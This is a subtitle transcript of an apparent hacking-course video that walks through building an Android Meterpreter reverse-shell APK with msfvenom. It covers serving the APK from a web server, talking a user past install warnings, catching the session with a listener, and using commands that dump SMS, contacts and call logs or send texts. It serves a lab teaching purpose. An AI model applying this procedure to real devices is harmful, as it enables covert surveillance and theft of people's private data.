1
00:00:00,540 --> 00:00:01,650
Instructor: Welcome back.

2
00:00:01,650 --> 00:00:03,990
Let's hack our Android device with the help

3
00:00:03,990 --> 00:00:07,323
of the Android payload that we'll craft with MSFVenom.

4
00:00:08,220 --> 00:00:10,560
So this is going to be our first attack.

5
00:00:10,560 --> 00:00:14,250
We're already familiar with both MSF Console and MSFVenom,

6
00:00:14,250 --> 00:00:16,980
so we can go straight into hacking the target.

7
00:00:16,980 --> 00:00:20,370
Now, if you might be asking why am I using ZSH right here?

8
00:00:20,370 --> 00:00:23,250
Well, I just decided to switch the terminal a little bit

9
00:00:23,250 --> 00:00:26,130
and I'm going to go and use ZSH

10
00:00:26,130 --> 00:00:29,340
throughout this section most of the time actually.

11
00:00:29,340 --> 00:00:33,000
But nonetheless, you can use the regular terminal like this.

12
00:00:33,000 --> 00:00:35,790
Whatever you feel like it is exactly the same.

13
00:00:35,790 --> 00:00:37,860
It just looks a little bit different.

14
00:00:37,860 --> 00:00:40,410
But nonetheless, what is important for this attack is

15
00:00:40,410 --> 00:00:42,540
that you have your Kal Linux machine opened

16
00:00:42,540 --> 00:00:46,560
and you have your Android machine open right here.

17
00:00:46,560 --> 00:00:49,410
So once you get both of these things open

18
00:00:49,410 --> 00:00:52,080
the first thing that we want to do is, as usual

19
00:00:52,080 --> 00:00:54,180
we want to check out the IP address

20
00:00:54,180 --> 00:00:55,993
of our Kal Linux machine.

21
00:00:55,993 --> 00:00:57,300
We need the IP address

22
00:00:57,300 --> 00:00:59,640
in order to craft the payload.

23
00:00:59,640 --> 00:01:00,690
Once we check it out,

24
00:01:00,690 --> 00:01:04,290
in my case, it is 192.1.68.1.9.

25
00:01:04,290 --> 00:01:06,150
We want to generate the MSFVenom

26
00:01:06,150 --> 00:01:08,700
on payload for the Android device,

27
00:01:08,700 --> 00:01:10,980
but this is something that we haven't done before.

28
00:01:10,980 --> 00:01:14,130
We used meterpreter, we used the Windows Reverse TCP

29
00:01:14,130 --> 00:01:16,083
and all of those different payloads,

30
00:01:17,209 --> 00:01:20,580
but we never really saw how an Android payload looks like.

31
00:01:20,580 --> 00:01:23,610
Well, this is the first time and in order to craft it

32
00:01:23,610 --> 00:01:26,340
let us first navigate to the desktop

33
00:01:26,340 --> 00:01:30,660
and let's run the command, MSFVenom dash P

34
00:01:30,660 --> 00:01:32,010
and then the name of the payload,

35
00:01:32,010 --> 00:01:35,070
which is android slash metepreter

36
00:01:35,070 --> 00:01:39,330
slash reverse underscore TCP.

37
00:01:39,330 --> 00:01:41,580
And you will already notice

38
00:01:41,580 --> 00:01:43,170
that this is a meterpreter payload

39
00:01:43,170 --> 00:01:45,124
So we're going to get all

40
00:01:45,124 --> 00:01:45,960
of those cool options that we can use

41
00:01:45,960 --> 00:01:48,240
in the post exploitation with this

42
00:01:48,240 --> 00:01:50,490
meterpreter Android payload.

43
00:01:50,490 --> 00:01:54,000
Once we set the payload, we need to set the L host, and

44
00:01:54,000 --> 00:01:57,600
in my case, that is 192.168.1.9

45
00:01:57,600 --> 00:01:59,430
and the L port can be anything.

46
00:01:59,430 --> 00:02:01,473
So I'm just going to go with 5555.

47
00:02:02,792 --> 00:02:07,140
Once I set this, I want to output it as the file

48
00:02:07,140 --> 00:02:09,030
that can run on Android.

49
00:02:09,030 --> 00:02:11,670
Android has dot apk files.

50
00:02:11,670 --> 00:02:14,250
Those are applications that can run on Android device,

51
00:02:14,250 --> 00:02:15,570
so we must make sure that

52
00:02:15,570 --> 00:02:19,650
our payload has the extension of apk.

53
00:02:19,650 --> 00:02:24,650
We can call it, for example, Shell and then dot apk.

54
00:02:25,800 --> 00:02:26,670
This is a must.

55
00:02:26,670 --> 00:02:31,670
If you type something like dot exc or dot PY, it won't work.

56
00:02:31,950 --> 00:02:35,310
So make sure you add dot apk and once you craft

57
00:02:35,310 --> 00:02:38,040
the entire command, press enter.

58
00:02:38,040 --> 00:02:40,980
And while this payload is being created, let's go

59
00:02:40,980 --> 00:02:42,273
to the second terminal.

60
00:02:43,110 --> 00:02:48,110
I will enter the ZSH and I will go and start the Apache2

61
00:02:48,870 --> 00:02:52,440
web server, just so we can actually transfer the payload

62
00:02:52,440 --> 00:02:56,010
from our Kal Linux machine to the Android device.

63
00:02:56,010 --> 00:02:58,830
I'm going to enter my password right here, and

64
00:02:58,830 --> 00:03:00,750
once the Apache tool has been started,

65
00:03:00,750 --> 00:03:02,520
we can go back to the first terminal.

66
00:03:02,520 --> 00:03:04,440
We can see the payload has been created.

67
00:03:04,440 --> 00:03:07,290
If I type LS, we will have it right here,

68
00:03:07,290 --> 00:03:09,180
which is shell dot apk.

69
00:03:09,180 --> 00:03:12,086
And what I'm going to do right now is I'm going to

70
00:03:12,086 --> 00:03:14,380
move that shell dot apk to do slash var slash

71
00:03:15,665 --> 00:03:18,310
www slash html directory in our Kal Linux machine

72
00:03:19,366 --> 00:03:21,510
because that directory is the web server directory.

73
00:03:21,510 --> 00:03:23,190
Hmm, permission denied.

74
00:03:23,190 --> 00:03:25,980
That is because this directory requires root privileges,

75
00:03:25,980 --> 00:03:27,990
so let's just type pseudo

76
00:03:27,990 --> 00:03:31,290
and then move it to that directory.

77
00:03:31,290 --> 00:03:34,920
If I go there, type LS

78
00:03:34,920 --> 00:03:37,890
we're going to have our Shell dot apk there.

79
00:03:37,890 --> 00:03:39,270
Now that we have that ready,

80
00:03:39,270 --> 00:03:43,020
let's go and start MSF console.

81
00:03:43,020 --> 00:03:44,220
While it is starting,

82
00:03:44,220 --> 00:03:46,920
we're going to go to our Android device

83
00:03:46,920 --> 00:03:49,800
and here is where it gets tricky a little bit.

84
00:03:49,800 --> 00:03:51,660
As I mentioned in the theory video,

85
00:03:51,660 --> 00:03:54,180
there are a lot of things that the target has to do

86
00:03:54,180 --> 00:03:57,270
in order for this payload to be executed.

87
00:03:57,270 --> 00:03:59,220
The first thing that they have to do, is they

88
00:03:59,220 --> 00:04:03,960
actually have to visit your link where your payload is.

89
00:04:03,960 --> 00:04:06,570
In our case, or in my case, it is

90
00:04:06,570 --> 00:04:10,773
under the IP address of 192.168.1.9.

91
00:04:12,210 --> 00:04:14,280
So I'm going to visit that payload

92
00:04:14,280 --> 00:04:17,850
and we're going to see this shell dot apk right here.

93
00:04:17,850 --> 00:04:19,142
If they click on that,

94
00:04:21,390 --> 00:04:22,530
the download will finish

95
00:04:22,530 --> 00:04:25,380
and then they have to click on open.

96
00:04:25,380 --> 00:04:28,950
Now this can only be achieved if your target, for example

97
00:04:28,950 --> 00:04:31,380
thinks that the payload is something,

98
00:04:31,380 --> 00:04:33,090
or something that they want to download.

99
00:04:33,090 --> 00:04:35,550
In other words, if they suspect

100
00:04:35,550 --> 00:04:38,040
of the payload being anything else but thing

101
00:04:38,040 --> 00:04:39,390
that they want to download,

102
00:04:40,374 --> 00:04:41,251
this will most likely fail

103
00:04:41,251 --> 00:04:43,830
and they will never download your application and run it,

104
00:04:43,830 --> 00:04:46,680
especially once they reach this part right here.

105
00:04:46,680 --> 00:04:48,875
If they actually read what this application

106
00:04:48,875 --> 00:04:50,550
will be able to do

107
00:04:50,550 --> 00:04:53,220
it tells us that it'll get access

108
00:04:53,220 --> 00:04:55,020
to modifying system settings,

109
00:04:55,020 --> 00:04:58,770
take pictures and videos, modify your contacts

110
00:04:58,770 --> 00:05:03,630
record audio, directly call phone numbers, read call logs

111
00:05:03,630 --> 00:05:07,590
read phone status and identity and write call logs.

112
00:05:07,590 --> 00:05:09,390
And this is not the only thing.

113
00:05:09,390 --> 00:05:12,270
If we click on next, it gives us even more things

114
00:05:12,270 --> 00:05:14,670
that this application will be able to do,

115
00:05:14,670 --> 00:05:18,360
which is read your text messages, receive text messages

116
00:05:18,360 --> 00:05:21,690
modify or delete contents of your SD card

117
00:05:21,690 --> 00:05:24,510
and none applications should be able to do all

118
00:05:24,510 --> 00:05:25,800
of these things.

119
00:05:25,800 --> 00:05:28,620
However, most of them will not read through this.

120
00:05:28,620 --> 00:05:30,243
They will just click on install.

121
00:05:31,740 --> 00:05:33,930
The application will take a few seconds to install

122
00:05:33,930 --> 00:05:36,510
and it'll tell you that this app was built

123
00:05:36,510 --> 00:05:39,180
for an older version of Android and doesn't include

124
00:05:39,180 --> 00:05:41,520
the latest privacy protections.

125
00:05:41,520 --> 00:05:43,353
If they click on install anyway,

126
00:05:44,520 --> 00:05:46,740
the app will fully be installed.

127
00:05:46,740 --> 00:05:49,380
They might get this warning right here.

128
00:05:49,380 --> 00:05:50,970
It depends of the Android version.

129
00:05:50,970 --> 00:05:53,910
It says Play Protect hasn't seen this app before

130
00:05:53,910 --> 00:05:58,080
to protect yourself and others send it for a security scan.

131
00:05:58,080 --> 00:05:59,970
They will most likely, if they came up to this point

132
00:05:59,970 --> 00:06:02,220
they will not send anything for the scan

133
00:06:02,220 --> 00:06:05,160
and they will just run the application.

134
00:06:05,160 --> 00:06:06,600
But before we actually run it

135
00:06:06,600 --> 00:06:10,350
we need to set up a listener inside of our MSF console.

136
00:06:10,350 --> 00:06:13,680
So let's go and type use expert multi-handler

137
00:06:13,680 --> 00:06:14,970
and let's set the payload

138
00:06:14,970 --> 00:06:19,970
to be Android interpreter reverse TCP.

139
00:06:21,840 --> 00:06:25,740
We need to set the L host to be 192.168.1.9

140
00:06:25,740 --> 00:06:29,250
and set LPORT to be 5555.

141
00:06:29,250 --> 00:06:30,630
Once we do all of that

142
00:06:30,630 --> 00:06:32,370
we can press run

143
00:06:32,370 --> 00:06:35,096
and while our listener is being executed

144
00:06:35,096 --> 00:06:37,083
they can run the application,

145
00:06:38,190 --> 00:06:42,150
which on their screen, nothing will actually happen.

146
00:06:42,150 --> 00:06:44,763
But if we go back to our Kal Linux machine,

147
00:06:46,116 --> 00:06:48,270
we have the interpreter session one open

148
00:06:48,270 --> 00:06:50,220
and if I type get user ID,

149
00:06:50,220 --> 00:06:53,490
I will see what is the user ID of the target.

150
00:06:53,490 --> 00:06:55,298
If I type help,

151
00:06:55,298 --> 00:06:56,940
I will see all the available commands that I can run

152
00:06:56,940 --> 00:06:59,130
on the target entry device

153
00:06:59,130 --> 00:07:01,530
and we can say it's not really the same

154
00:07:01,530 --> 00:07:03,780
as for the Windows meterpreter shell.

155
00:07:03,780 --> 00:07:06,750
We have a few new things such as screen share.

156
00:07:06,750 --> 00:07:09,270
We have two fully new sections

157
00:07:09,270 --> 00:07:12,060
of the commands, such as Android commands right here.

158
00:07:12,060 --> 00:07:14,520
Here we can use activity start, check route,

159
00:07:14,520 --> 00:07:19,290
dump call log, dump contacts, dump SMS, geo locate,

160
00:07:19,290 --> 00:07:21,840
hide app icon, and many other things.

161
00:07:21,840 --> 00:07:23,760
We can even send SMS.

162
00:07:23,760 --> 00:07:26,383
However, if you try any of these commands

163
00:07:26,383 --> 00:07:28,830
in an actual virtual machine,

164
00:07:28,830 --> 00:07:30,000
of course they will not work

165
00:07:30,000 --> 00:07:33,240
because we cannot send an SMS from a virtual machine.

166
00:07:33,240 --> 00:07:36,690
But if you were to hack an actual Android device,

167
00:07:36,690 --> 00:07:40,410
you can type send SMS, then dash D

168
00:07:40,410 --> 00:07:41,550
and as it says right here

169
00:07:41,550 --> 00:07:44,550
dash D specifies the destination address.

170
00:07:44,550 --> 00:07:47,160
In our case, that should be a phone number, so

171
00:07:47,160 --> 00:07:49,530
you specify the phone number that you want to send this to.

172
00:07:49,530 --> 00:07:51,480
It can be anything,

173
00:07:51,480 --> 00:07:54,960
and dash D is the actual text

174
00:07:54,960 --> 00:07:56,520
that you want to send.

175
00:07:56,520 --> 00:07:58,650
It must be a text between the double quotes,

176
00:07:58,650 --> 00:08:01,680
and you can type anything such as, "Hello World."

177
00:08:01,680 --> 00:08:05,310
Of course this won't work because our target is

178
00:08:05,310 --> 00:08:07,830
an actual virtual machine, but if you were to once

179
00:08:07,830 --> 00:08:10,230
again hack an actual Android device

180
00:08:10,230 --> 00:08:13,470
this will send text message to this phone number

181
00:08:13,470 --> 00:08:16,286
with this, "Hello world" message.

182
00:08:16,286 --> 00:08:17,970
Cool, right?

183
00:08:17,970 --> 00:08:20,250
And that is just one of the commands that you can do.

184
00:08:20,250 --> 00:08:22,410
You can dump all of the SMS messages

185
00:08:22,410 --> 00:08:24,600
if you type dump underscore SMS.

186
00:08:24,600 --> 00:08:26,700
This will print out all of the messages

187
00:08:26,700 --> 00:08:28,830
that that target has stored,

188
00:08:28,830 --> 00:08:32,610
so you can see what the target has talked with other people.

189
00:08:32,610 --> 00:08:35,990
You can even go and try to dump contacts in order to get all

190
00:08:35,990 --> 00:08:37,799
of the contacts from their phone.

191
00:08:37,799 --> 00:08:40,559
You can dump call logs to see all the people

192
00:08:40,559 --> 00:08:43,530
that they actually had a voice call with.

193
00:08:43,530 --> 00:08:44,580
There are other cool options

194
00:08:44,580 --> 00:08:46,590
as well, such as WLAN, geo locate,

195
00:08:46,590 --> 00:08:51,090
and it says, Get current lat-log using WLAN information

196
00:08:51,090 --> 00:08:54,630
and this lat-log is simply just latitude and longitude.

197
00:08:54,630 --> 00:08:56,400
In the application controller commands

198
00:08:56,400 --> 00:08:59,520
what you can do is you can install different applications.

199
00:08:59,520 --> 00:09:00,870
You can list applications.

200
00:09:00,870 --> 00:09:03,450
If I type app underscore list

201
00:09:03,450 --> 00:09:07,341
for some reason this time it'll time out, but nonetheless

202
00:09:07,341 --> 00:09:10,290
that could be because this send SMS message.

203
00:09:10,290 --> 00:09:11,880
We're going to check out this app list

204
00:09:11,880 --> 00:09:14,490
in the next video once we try out different attack.

205
00:09:14,490 --> 00:09:16,110
But one more thing I want to show you

206
00:09:16,110 --> 00:09:18,480
before I close off this video is

207
00:09:18,480 --> 00:09:22,680
that actual place where your application got installed.

208
00:09:22,680 --> 00:09:25,413
If I just close this Google Chrome first,

209
00:09:26,460 --> 00:09:29,160
is if you go to the applications,

210
00:09:29,160 --> 00:09:33,750
which you can go to by clicking on this arrow right here,

211
00:09:33,750 --> 00:09:36,180
you will have this main activity

212
00:09:36,180 --> 00:09:39,450
with the Android logo, and this is our payload.

213
00:09:39,450 --> 00:09:42,180
This is the virus that we sent to the target.

214
00:09:42,180 --> 00:09:45,240
In order to uninstall it, you can simply just hold

215
00:09:45,240 --> 00:09:49,350
onto it a little bit and then drag it to the uninstall

216
00:09:49,350 --> 00:09:53,010
and this will uninstall the payload from the Android device.

217
00:09:53,010 --> 00:09:54,180
Just in case you're testing

218
00:09:54,180 --> 00:09:56,280
on a real Android device and you want to make sure

219
00:09:56,280 --> 00:09:59,700
that you delete it afterwards, you can do that.

220
00:09:59,700 --> 00:10:01,440
Nonetheless, this is our first attack

221
00:10:01,440 --> 00:10:02,910
on an Android device and

222
00:10:02,910 --> 00:10:05,220
in the next video we're going to check out a similar attack

223
00:10:05,220 --> 00:10:09,330
with the Android payload just by using a different tool.

224
00:10:09,330 --> 00:10:11,010
And then we're also going to test

225
00:10:11,010 --> 00:10:13,620
out the Android application commands.

226
00:10:13,620 --> 00:10:14,920
See you in the next video.